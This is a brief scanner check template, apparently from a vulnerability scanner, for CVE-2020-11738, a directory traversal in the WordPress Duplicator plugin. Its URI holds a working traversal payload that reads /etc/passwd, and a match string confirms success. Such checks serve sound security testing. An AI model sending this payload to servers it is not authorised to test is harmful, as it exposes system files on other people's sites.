AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal'
URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
METHOD='GET'
MATCH="root\:x"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'